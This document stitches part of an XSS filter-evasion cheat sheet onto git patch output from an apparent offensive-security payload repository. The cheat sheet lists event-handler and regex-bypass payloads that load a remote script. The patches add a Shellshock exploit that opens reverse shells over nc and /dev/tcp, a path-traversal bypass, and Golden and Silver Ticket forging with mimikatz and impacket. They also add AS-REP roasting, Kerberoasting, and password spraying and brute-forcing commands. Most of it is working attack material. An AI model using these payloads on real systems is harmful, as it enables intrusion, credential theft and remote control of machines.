class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Event Handlers List 1 - See Below - Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (http://www.secaron.de/) for the HTML+TIME updates: - --FSCommand() (execute from within an embedded Flash object) - --onAbort() (when user aborts the loading of an image) - --onActivate() (when object is set as the active element) - --onAfterPrint() (activates after user prints or previews print job) - --onAfterUpdate() (activates on data object after updating data in the source object) - --onBeforeActivate() (fires before the object is set as the active element) - --onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard (use the execCommand("Copy") function) - --onBeforeCut() (attacker executes the attack string right before a selection is cut) - --onBeforeDeactivate() (fires right after the activeElement is changed from the current object) - --onBeforeEditFocus() (fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected) - --onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function) - --onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function) - --onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent) - --onBegin() (fires immediately when the element's timeline begins) - --onBlur() (in the case where another popup is loaded and window loses focus) - --onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window) - --onCellChange() (fires when data changes in the data provider) - --onChange() (fires when select, text, or TEXTAREA field loses focus and its value has been modified) - --onClick() (fires when someone clicks on a form) - --onContextMenu() (user would need to right click on attack area) - --onControlSelect() (fires when the user is about to make a control selection of the object) - --onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command) - --onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command) - --onDataAvailible() (user would need to change data in an element, or attacker could perform the same function) - --onDataSetChanged() (fires when the data set exposed by a data source object changes) - --onDataSetComplete() (fires to indicate that all data is available from the data source object) - --onDblClick() (fires when user double-clicks a form element or a link) - --onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document) - --onDrag() (requires that the user drags an object) - --onDragEnd() (requires that the user drags an object) - --onDragLeave() (requires that the user drags an object off a valid location) - --onDragEnter() (requires that the user drags an object into a valid location) - --onDragOver() (requires that the user drags an object into a valid location) - --onDragDrop() (user drops an object (e.g. file) onto the browser window) - --onDrop() (fires when user drops an object (e.g. file) onto the browser window) - - - - Browser support: - - - Event Handlers List 2 - See Below - - -onEnd() (fires when the timeline ends. This can be exploited, like most of the HTML+TIME event handlers by doing something like <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">) - --onError() (loading of a document or image causes an error) - --onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object) - --onFilterChange() (fires when a visual filter completes state change) - --onFinish() (attacker could create the exploit when marquee is finished looping) - --onFocus() (attacker executes the attack string when the window gets focus) - --onFocusIn() (attacker executes the attack string when window gets focus) - --onFocusOut() (attacker executes the attack string when window loses focus) - --onHelp() (attacker executes the attack string when users hits F1 while the window is in focus) - --onKeyDown() (fires when user depresses a key) - --onKeyPress() (fires when user presses or holds down a key) - --onKeyUp() (fires when user releases a key) - --onLayoutComplete() (user would have to print or print preview) - --onLoad() (attacker executes the attack string after the window loads) - --onLoseCapture() (can be exploited by the releaseCapture() method) - --onMediaComplete() (when a streaming media file is used, this event could fire before the file starts playing) - --onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem) - --onMouseDown() (the attacker would need to get the user to click on an image) - --onMouseEnter() (fires when cursor moves over an object or area) - --onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again) - --onMouseMove() (the attacker would need to get the user to mouse over an image or table) - --onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again) - --onMouseOver() (fires when cursor moves over an object or area) - --onMouseUp() (the attacker would need to get the user to click on an image) - --onMouseWheel() (the attacker would need to get the user to use their mouse wheel) - --onMove() (user or attacker would move the page) - --onMoveEnd() (user or attacker would move the page) - --onMoveStart() (user or attacker would move the page) - --onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline) - --onPaste() (user would need to paste or attacker could use the execCommand("Paste") function) - --onPause() (fires on every element that is active when the timeline pauses, including the body element) - --onProgress() (attacker would use this as a flash movie was loading) - --onPropertyChange() (user or attacker would need to change an element property) - --onReadyStateChange() (user or attacker would need to change an element property) - - - - Browser support: - - - Event Handlers List 3 - See Below - -onRepeat() (fires once for each repetition of the timeline, excluding the first full cycle) - --onReset() (fires when user or attacker resets a form) - --onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) - --onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) - --onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) - --onResume() (fires on every element that becomes active when the timeline resumes, including the body element) - --onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward) - --onRowEnter() (user or attacker would need to change a row in a data source) - --onRowExit() (user or attacker would need to change a row in a data source) - --onRowDelete() (user or attacker would need to delete a row in a data source) - --onRowInserted() (user or attacker would need to insert a row in a data source) - --onScroll() (user would need to scroll, or attacker could use the scrollBy() function) - --onSeek() (fires when the timeline is set to play in any direction other than forward) - --onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) - --onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) - --onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) - --onStart() (fires at the beginning of each marquee loop) - --onStop() (user would need to press the stop button or leave the webpage) - --onSynchRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire) - --onSubmit() (requires attacker or user submits a form) - --onTimeError() (fires when user or attacker sets a time property, such as "dur", to an invalid value) - --onTrackChange() (fires when user or attacker changes track in a playList) - --onUnload() (fires when the user clicks any link or presses the back button or attacker forces a click) - --onURLFlip() (fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file) - --seekSegmentTime() (locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.) - - - - Browser support: - - - Evade Regex Filter 1 - <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> - - For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of the following regex filter: - /<script[^>]+src/i - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Evade Regex Filter 2 - <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> - For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter: - /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i - -(this is an important one, because I've seen this regex in the wild) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Evade Regex Filter 3 - <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> - Another XSS to evade this regex filter: - /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Evade Regex Filter 4 - <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> - Yet another XSS to evade the same filter: - /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i -The only thing I've seen work against this XSS attack if you still want to allow <SCRIPT> tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Evade Regex Filter 5 - <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> - And one last XSS attack (using grave accents) to evade this regex: - /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Filter Evasion 1 - <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> - - This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Filter Evasion 2 - <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> - Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IP Encoding - <A HREF="http://66.102.7.147/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - URL Encoding - <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Dword Encoding - <A HREF="http://1113982867/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Hex Encoding - <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). -The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex digit is not required. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Octal Encoding - <A HREF="http://0102.0146.0007.00000223/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). -Padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc... - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Mixed Encoding - <A HREF="h tt p://6&#09;6.000146.0x7.147/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). -The tabs and newlines only work if this is encapsulated with quotes. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Protocol Resolution Bypass - <A HREF="//www.google.com/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). -Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to Ozh (http://planetOzh.com/) for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Firefox Lookups 1 - <A HREF="//google">XSS</A> - Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatenate several keywords by using something like the following "keyword:XSS+RSnake" - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Firefox Lookups 2 - <A HREF="http://ha.ckers.org@google">XSS</A> - This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera. - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Firefox Lookups 3 - <A HREF="http://google:ha.ckers.org">XSS</A> - This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"). - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Removing Cnames - <A HREF="http://google.com/">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). -When combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Extra dot for Absolute DNS - <A HREF="http://www.google.com./">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - JavaScript Link Location - <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> - URL string evasion (assuming "http://www.google.com/" is programmatically disallowed) -JavaScript link location - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Content Replace - <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> - Content replace as an attack vector (assuming "http://www.google.com/" is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector ("java&#x26;#x09;script:" was converted into "java&#x09;script:". - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - diff --git a/XSS Injection/Files/xss.url.url b/XSS Injection/Files/xss.url.url new file mode 100644 index 00000000..325158b1 --- /dev/null +++ b/XSS Injection/Files/xss.url.url @@ -0,0 +1,3 @@ + + + \ No newline at end of file From 8dffb59ac51effed3a964aa5050476bf124af6c8 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 18 Aug 2019 22:24:48 +0200 Subject: [PATCH 042/222] Pspy + Silver Ticket + MSSQL connect --- CVE Exploits/README.md | 5 +- Directory Traversal/README.md | 9 ++ File Inclusion/README.md | 2 +- .../Active Directory Attack.md | 112 ++++++++++++------ .../Linux - Privilege Escalation.md | 8 ++ .../Windows - Persistence.md | 13 ++ .../Windows - Privilege Escalation.md | 2 + SQL Injection/MSSQL Injection.md | 33 +++++- SQL Injection/README.md | 1 + 9 files changed, 141 insertions(+), 44 deletions(-) diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md index 41b223c6..8563a19e 100644 --- a/CVE Exploits/README.md +++ b/CVE Exploits/README.md @@ -10,8 +10,9 @@ The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptograph Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. -```bash -echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n +```powershell +echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n" +curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi" ``` ## CVE-2017-5638 - Apache Struts 2 diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index cedc13ca..1420178b 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -9,11 +9,13 @@ * [16 bits Unicode encoding](#) * [UTF-8 Unicode encoding](#) * [Bypass "../" replaced by ""](#) + * [Bypass "../" with ";"](#) * [Double URL encoding](#) * [UNC Bypass](#unc-bypass) * [Path Traversal](#path-traversal) * [Interesting Linux files](#) * [Interesting Windows files](#) +* [References](#references) ## Tools @@ -62,6 +64,13 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings ...\.\ ``` +### Bypass "../" with ";" + +```powershell +..;/ +http://domain.tld/page.jsp?include=..;/..;/sensitive.txt +``` + ### Double URL encoding ```powershell diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 255a83d7..29fbf59d 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -46,7 +46,7 @@ http://example.com/index.php?page=../../../etc/passwd ### Null byte -:warning: In versions of PHP below 5.3 we can terminate with null byte. +:warning: In versions of PHP below 5.3.4 we can terminate with null byte. ```powershell http://example.com/index.php?page=../../../etc/passwd%00 diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 91056a72..0ee74089 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -9,8 +9,8 @@ * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol) * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit) * [Password in AD User comment](#password-in-ad-user-comment) - * [Golden Tickets](#passtheticket-golden-tickets) - * [Silver Tickets](#passtheticket-silver-tickets) + * [Pass-the-Ticket Golden Tickets](#passtheticket-golden-tickets) + * [Pass-the-Ticket Silver Tickets](#passtheticket-silver-tickets) * [Kerberoast](#kerberoast) * [KRB_AS_REP roasting](#krb_as_rep-roasting) * [Pass-the-Hash](#pass-the-hash) @@ -393,31 +393,33 @@ or dump the Active Directory and `grep` the content. ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ ``` -### PassTheTicket Golden Tickets +### Pass-the-Ticket Golden Tickets -Forging a TGT require the krbtgt key +Forging a TGT require the krbtgt NTLM hash -Mimikatz version +> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt ntlm hash must be used. + +#### Using Mimikatz ```powershell -Get info - Mimikatz +# Get info - Mimikatz lsadump::dcsync /user:krbtgt lsadump::lsa /inject /name:krbtgt -Forge a Golden ticket - Mimikatz +# Forge a Golden ticket - Mimikatz kerberos::purge kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt kerberos::tgt ``` -Meterpreter version +#### Using Meterpreter ```powershell -Get info - Meterpreter(kiwi) +# Get info - Meterpreter(kiwi) dcsync_ntlm krbtgt dcsync krbtgt -Forge a Golden ticket - Meterpreter +# Forge a Golden ticket - Meterpreter load kiwi golden_ticket_create -d -k -s -u -t golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck @@ -426,40 +428,51 @@ kerberos_ticket_use /root/Downloads/pentestlabuser.tck kerberos_ticket_list ``` -Using a ticket on Linux +#### Using a ticket on Linux ```powershell -Convert the ticket kirbi to ccache with kekeo +# Convert the ticket kirbi to ccache with kekeo misc::convert ccache ticket.kirbi -Alternatively you can use ticketer from Impacket +# Alternatively you can use ticketer from Impacket ./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519 ./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519 - export KRB5CCNAME=/home/user/ticket.ccache cat $KRB5CCNAME - -NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file +# NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` -### PassTheTicket Silver Tickets +If you need to swap ticket between Windows and Linux, you need to convert them with `ticket_converter` or `kekeo`. + +```powershell +root@kali:ticket_converter$ python ticket_converter.py velociraptor.ccache velociraptor.kirbi +Converting ccache => kirbi +root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi velociraptor.ccache +Converting kirbi => ccache +``` + +### Pass-the-Ticket Silver Tickets Forging a TGS require machine accound password (key) from the KDC ```powershell -Create a ticket for the service -kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE -/kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt +# Create a ticket for the service +mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE -Then use the same steps as a Golden ticket -misc::convert ccache ticket.kirbi -export KRB5CCNAME=/home/user/ticket.ccache -./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 +# Examples +mimikatz $ /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt +mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park + +# Then use the same steps as a Golden ticket +mimikatz $ misc::convert ccache ticket.kirbi + +root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache +root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` ### Kerberoast @@ -483,7 +496,7 @@ $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c1 Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus) ```powershell -.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD +.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt ``` Then crack the ticket with hashcat or john @@ -499,7 +512,7 @@ If a domain user does not have Kerberos preauthentication enabled, an AS-REP can ```powershell C:\>git clone https://github.com/GhostPack/Rubeus#asreproast -C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user +C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast ______ _ (_____ \ | | @@ -527,6 +540,19 @@ v1.3.4 [*] AS-REP hash: $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)... + +C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast +``` + +Using `impacket` to get the hash and `hashcat` to crack it. + +```powershell +# extract hashes +root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast +root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast + +# crack AS_REP messages +root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt ``` ### Pass-the-Hash @@ -565,22 +591,30 @@ sekurlsa::pth /user: /domain: /ntlm:.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt +C:\Users\triceratops>.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd +``` + ### Capturing and cracking NTLMv2 hashes If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. @@ -817,26 +851,29 @@ Password spraying refers to the attack method that takes a large number of usern > The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. -Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. +#### Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. + +> Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771). ```powershell root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 +root@kali:~$ python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt ``` -Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. +#### Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. ```powershell crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` ``` -Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services. +#### Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services. ```powershell python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP] ``` -Using [hydra]() and [ncrack]() to target RDP services. +#### Using [hydra]() and [ncrack]() to target RDP services. ```powershell hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10 @@ -950,4 +987,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/) * [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) -* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) \ No newline at end of file +* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) +* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 7b14c770..e01d4be8 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -213,6 +213,14 @@ cat /etc/cron.allow cat /etc/cron.deny* ``` +You can use [pspy](https://github.com/DominicBreuker/pspy) to detect a CRON job. + +```powershell +# print both commands and file system events and scan procfs every 1000 ms (=1sec) +./pspy64 -pf -i 1000 +``` + + ## Systemd timers ```powershell diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 4873b3db..d8fa2cd3 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -1,5 +1,18 @@ # Windows - Persistence +## Summary + +* [Userland](#userland) + * [Registry](#registry) + * [Startup](#startup) + * [Scheduled Task](#scheduled-task) +* [Elevated](#elevated) + * [HKLM](#hklm) + * [Services](#services) + * [Scheduled Task](#scheduled-task) +* [References](#references) + + ## Userland ### Registry diff 